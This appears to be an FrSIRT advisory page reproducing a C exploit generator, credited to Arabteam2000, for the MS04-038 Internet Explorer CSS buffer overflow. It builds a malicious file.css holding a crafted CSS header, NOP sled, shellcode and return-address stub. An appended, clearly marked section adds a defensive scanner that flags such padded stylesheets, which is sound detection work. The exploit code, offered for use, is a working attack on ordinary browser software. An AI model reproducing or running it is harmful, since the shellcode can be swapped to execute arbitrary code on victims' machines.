French Security Incident Response Team

 


 






Internet Explorer CSS File Remote Buffer Overflow Exploit (MS04-038)
Date : 09/03/2005

 
CAN-2004-0842

#include <stdio.h>
#include <string.h>
#include <tchar.h>

char bug[]=
"\x40\x63\x73\x73\x20\x6D\x6D\x7B\x49\x7B\x63\x6F\x6E\x74\x65\x6E\x74\x3A\x20\x22\x22\x3B\x2F"
"\x2A\x22\x20\x22\x2A\x2F\x7D\x7D\x40\x6D\x3B\x40\x65\x6E\x64\x3B\x20\x2F\x2A\x22\x7D\x7D\x20\x20\x20";

//////////////////////////////////////////////////////
/*
shellcode :MessageBox (0,"hack ie6",0,MB_OK);
-
XOR EBX,EBX
PUSH EBX ; 0
PUSH EBX ; 0
ADD AL,0F
PUSH EAX ; Msg " Hack ie6 "
PUSH EBX ;0
JMP 746D8E72 ;USER32.MessageBoxA
*/

char shellcode[]= "\x33\xDB\x53\x53\x04\x0F\x50\x53\xE9\xCB\x8D\x6D\x74"
"\x90\x90\x48\x61\x63\x6B\x20\x69\x65\x36\x20\x63\x73\x73";


////////////////////////////////////////////////////////
// return address :: esp+1AC :: start shellcode
//MOV EAX,ESP
//ADD AX,1AC
//CALL EAX

char ret[]= "\x8B\xC4\x66\x05\xAC\x01\xFF\xD0";

int main(int argc, char* argv[])
{
    char buf[8192];
    FILE *cssfile;
    int i;

    printf("\n\n Internet Explorer(mshtml.dll) , Cascading Style Sheets Exploit \n");
    printf(" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n");
    printf(" Coded by : Arabteam2000 \n");
    printf(" Web: www.arabteam2000.com \n");
    printf(" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n");

    // NOP`s
    for(i=0;i<8192;i++)
        buf[i]=0x90;

    // bug
    memcpy((void*)&buf[0],
           (void*)&bug,48);

    // shellcode
    memcpy((void*)&buf[100],
           (void*)&shellcode,27);

    // ret address
    memcpy((void*)&buf[8182],
           (void*)&ret,8);

    cssfile=fopen("file.css","w+b");
    if(cssfile==NULL){
        printf("-Error: fopen \n");
        return 1;
    }

    fwrite(buf,8192,1,cssfile);
    printf("-Created file: file.css\n ..OK\n\n");

    fclose (cssfile);
    return 0;
}
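
Detection note (an added example, not part of the original advisory or the Arabteam2000 code): the generator above writes an 8192-byte file.css that is a short CSS header followed almost entirely by 0x90 padding, which no legitimate stylesheet contains. The scanner below flags such files; the names scan_css and struct css_scan and both thresholds are assumptions made for this example, and the sample buffers are constructed.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Result of scanning one stylesheet buffer. */
struct css_scan {
    size_t longest_nop_run;  /* longest run of consecutive 0x90 bytes */
    size_t non_text;         /* bytes that are not printable ASCII, tab, CR or LF */
    int suspicious;          /* 1 if either threshold below is reached */
};

/* Assumed thresholds for this example. A UTF-8 stylesheet with a lot of
   non-ASCII text can reach the percentage limit, so tune it per corpus;
   valid UTF-8 never contains 32 consecutive 0x90 bytes. */
#define NOP_RUN_LIMIT 32
#define NON_TEXT_PERCENT_LIMIT 10

struct css_scan scan_css(const unsigned char *data, size_t len)
{
    struct css_scan r = {0, 0, 0};
    size_t run = 0;
    for (size_t i = 0; i < len; i++) {
        unsigned char c = data[i];
        if (c == 0x90) {
            if (++run > r.longest_nop_run)
                r.longest_nop_run = run;
        } else {
            run = 0;
        }
        if (!((c >= 0x20 && c <= 0x7e) || c == '\t' || c == '\r' || c == '\n'))
            r.non_text++;
    }
    r.suspicious = r.longest_nop_run >= NOP_RUN_LIMIT ||
                   (len > 0 && r.non_text * 100 / len >= NON_TEXT_PERCENT_LIMIT);
    return r;
}

int main(void)
{
    /* Constructed samples: an ordinary rule, and a short header plus 0x90 padding. */
    static const unsigned char benign[] = "body { color: #333; margin: 0 }\n";
    unsigned char padded[256];
    memset(padded, 0x90, sizeof padded);
    memcpy(padded, "@media x{}", 10);
    struct css_scan a = scan_css(benign, sizeof benign - 1);
    struct css_scan b = scan_css(padded, sizeof padded);
    printf("benign: suspicious=%d\n", a.suspicious);
    printf("padded: suspicious=%d nop_run=%zu\n", b.suspicious, b.longest_nop_run);
    return 0;
}
```

The same two checks can run at a web proxy or mail gateway on any response served as text/css, before the file reaches an unpatched client.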





Copyright © 2002-2005 FrSIRT - Privacy Policy